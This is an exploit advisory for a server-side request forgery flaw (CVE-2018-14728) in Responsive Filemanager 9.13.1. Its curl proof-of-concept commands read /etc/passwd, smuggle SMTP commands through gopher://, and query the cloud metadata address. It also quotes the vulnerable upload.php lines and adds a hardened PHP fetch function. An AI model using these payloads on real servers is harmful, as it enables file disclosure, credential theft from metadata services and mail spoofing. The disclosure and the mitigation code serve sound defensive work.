Responsive Filemanager 9.13.1 Server-Side Request Forgery
Posted Jul 29, 2018
Authored by Guia Brahim Fouad

Responsive Filemanager version 9.13.1 suffers from a server-side request forgery vulnerability.

tags | exploit
advisories | CVE-2018-14728
MD5 | 9ea189ebe988e84ea737aadd00966199

# Exploit Title: Responsive filemanager - SSRF
# Date: 29/07/2018
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728

Type
[Security] Bug report - SSRF - Security Issue

PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=http://169.254.169.254/openstack'
...

Description of the problem
Server Side Request Forgery (SSRF) refers to an attack wherein an attacker
is able to send a crafted request from a vulnerable web application. SSRF
is usually used to target internal systems behind firewalls that are
normally inaccessible to an attacker from the external network.
Additionally, it's also possible for an attacker to leverage SSRF to access
services on the same server that are listening on the loopback interface
(127.0.0.1).

Typically, Server Side Request Forgery (SSRF) occurs when a web application
makes a request and an attacker has full or partial control of the
request that is being sent. A common example is when an attacker can
control all or part of the URL to which the web application makes a request
to some third-party service.

List the steps to reproduce the issue
The POST parameter 'url' is received in line 71 of the file upload.php and passed unvalidated to curl_init() in line 73.

File : upload.php

Line| Code
71 | if(isset($_POST['url'])){
73 | $ch = curl_init($_POST['url']);
77 | curl_exec($ch);
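
A hardened version of the fetch performed at lines 71-77, as an added example (not the vendor's fix and not code from the advisory): it accepts only http/https, refuses hosts that resolve to loopback, private or link-local addresses, and pins curl to the address that was vetted. The rfm_* function names and the blocklist are assumptions.

```php
<?php
// Added example (not ResponsiveFilemanager code); the rfm_* names are hypothetical.
// Assumes 64-bit PHP >= 7.0 with the curl extension; IPv6 targets are refused.
const RFM_BLOCKED = ['0.0.0.0/8', '10.0.0.0/8', '100.64.0.0/10', '127.0.0.0/8',
    '169.254.0.0/16', '172.16.0.0/12', '192.168.0.0/16', '224.0.0.0/3'];

function rfm_ip_blocked($ip)
{
    $n = ip2long($ip);
    if ($n === false) {
        return true;                       // not dotted-quad IPv4: refuse
    }
    foreach (RFM_BLOCKED as $cidr) {
        list($net, $bits) = explode('/', $cidr);
        $mask = (-1 << (32 - (int) $bits)) & 0xFFFFFFFF;
        if (($n & $mask) === (ip2long($net) & $mask)) {
            return true;                   // loopback, private, link-local (metadata), ...
        }
    }
    return false;
}

// Returns the response body, or null when the URL is refused or the fetch fails.
function rfm_fetch($url)
{
    $p = parse_url($url);
    $scheme = strtolower($p['scheme'] ?? '');
    if (!isset($p['host']) || !in_array($scheme, ['http', 'https'], true)) {
        return null;                       // refuses file://, gopher://, dict://, ...
    }
    $host = $p['host'];
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    $ips  = gethostbynamel($host) ?: [];   // every A record must be public
    if ($ips === [] || array_filter($ips, 'rfm_ip_blocked')) {
        return null;
    }
    // Rebuild the URL from parsed parts so curl sees the host that was vetted.
    $clean = "$scheme://$host:$port" . ($p['path'] ?? '/')
           . (isset($p['query']) ? '?' . $p['query'] : '');
    $ch = curl_init($clean);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect could point back inside
        CURLOPT_RESOLVE        => ["$host:$port:{$ips[0]}"], // pin the vetted address
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 15,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}
```

Pinning with CURLOPT_RESOLVE matters because a second DNS lookup at request time could return a different (internal) address than the one that passed the check.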

Environment
responsive filemanager version: 9.13.1
php version: 7.0
